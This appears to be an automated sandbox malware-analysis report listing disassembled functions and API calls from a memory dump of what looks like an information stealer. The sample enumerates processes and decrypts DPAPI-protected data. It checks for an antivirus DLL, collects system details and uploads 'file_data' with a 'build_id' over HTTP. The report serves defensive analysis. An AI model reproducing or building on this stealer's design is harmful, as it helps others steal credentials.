                                                                                                                                                        • Opcode Fuzzy Hash: 3cb6e8a710d4498e8812abe57448e33dc0f290ad47eb1370d56b55ec382773d2
                                                                                                                                                        • Instruction Fuzzy Hash: 17012170A01224DFDB74DB64DD44BDE77B9AF08311F8001E6E409E2290EB388F90CB15
                                                                                                                                                        Function 00410DDB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
                                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00410EFF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                        • String ID: /
                                                                                                                                                        • API String ID: 507856799-4001269591
                                                                                                                                                        • Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                                                        • Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
                                                                                                                                                        • Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
                                                                                                                                                        • Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54
                                                                                                                                                        Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1799959500-0
                                                                                                                                                        • Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                                                        • Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
                                                                                                                                                        • Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
                                                                                                                                                        • Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25
                                                                                                                                                        Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                                                        • LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                        • String ID: DPAPI
                                                                                                                                                        • API String ID: 2068576380-1690256801
                                                                                                                                                        • Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                                                        • Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
                                                                                                                                                        • Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
                                                                                                                                                        • Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90
                                                                                                                                                        Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
                                                                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 004114E4
                                                                                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 00411542
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041154D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 907984538-0
                                                                                                                                                        • Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                                                        • Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
                                                                                                                                                        • Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
                                                                                                                                                        • Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69
                                                                                                                                                        Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00410D50
                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
                                                                                                                                                        • wsprintfA.USER32 ref: 00410D7D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 362916592-0
                                                                                                                                                        • Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                                                        • Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
                                                                                                                                                        • Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
                                                                                                                                                        • Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785
                                                                                                                                                        Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                        • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1206570057-0
                                                                                                                                                        • Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                                                        • Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
                                                                                                                                                        • Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
                                                                                                                                                        • Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34
                                                                                                                                                        Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2452939696-0
                                                                                                                                                        • Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                                                        • Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
                                                                                                                                                        • Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
                                                                                                                                                        • Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44
                                                                                                                                                        Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2801902141.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcmpi
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1586166983-0
                                                                                                                                                        • Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                        • Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
                                                                                                                                                        • Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
                                                                                                                                                        • Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C
                                                                                                                                                        Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573stringnetworkmemoryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 29 405482-405593 call 4104e7 call 410519 call 404ab6 call 411e5d lstrlenA call 411e5d call 4104e7 * 4 StrCmpCA 48 405595 29->48 49 40559b-4055a1 29->49 48->49 50 4055a3-4055b8 InternetOpenA 49->50 51 4055be-4056ce call 411c4a call 4105c7 call 41058d call 402920 * 2 call 410609 call 4105c7 call 410609 call 41058d call 402920 * 3 call 410609 call 4105c7 call 41058d call 402920 * 2 InternetConnectA 49->51 50->51 52 405e64-405eec call 402920 * 4 call 410519 call 402920 * 3 50->52 51->52 118 4056d4-405712 HttpOpenRequestA 51->118 86 405eee-405f2e call 402920 * 6 call 41d016 52->86 119 405e58-405e5e InternetCloseHandle 118->119 120 405718-40571e 118->120 119->52 121 405720-405736 InternetSetOptionA 120->121 122 40573c-405d77 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 call 410609 call 41058d call 402920 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA call 427050 lstrlenA call 427050 lstrlenA * 2 call 427050 lstrlenA HttpSendRequestA HttpQueryInfoA 120->122 121->122 309 405db5-405dc5 call 411afd 122->309 310 405d79-405db0 call 4104e7 call 402920 * 3 122->310 315 405dcb-405dd0 309->315 316 405f2f 309->316 310->86 318 405e11-405e2e InternetReadFile 315->318 320 405e30-405e43 StrCmpCA 318->320 321 405dd2-405dda 318->321 323 405e45-405e46 ExitProcess 320->323 324 405e4c-405e52 InternetCloseHandle 320->324 321->320 326 405ddc-405e0c call 410609 call 41058d call 402920 321->326 324->119 326->318
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                          • Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                                                                          • Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                                                                          • Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                        • lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,bb7310eab4245006f125c442da2d1e50,",build_id,00437814,------), ref: 00405C67
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                                                        • _memmove.LIBCMT ref: 00405CB4
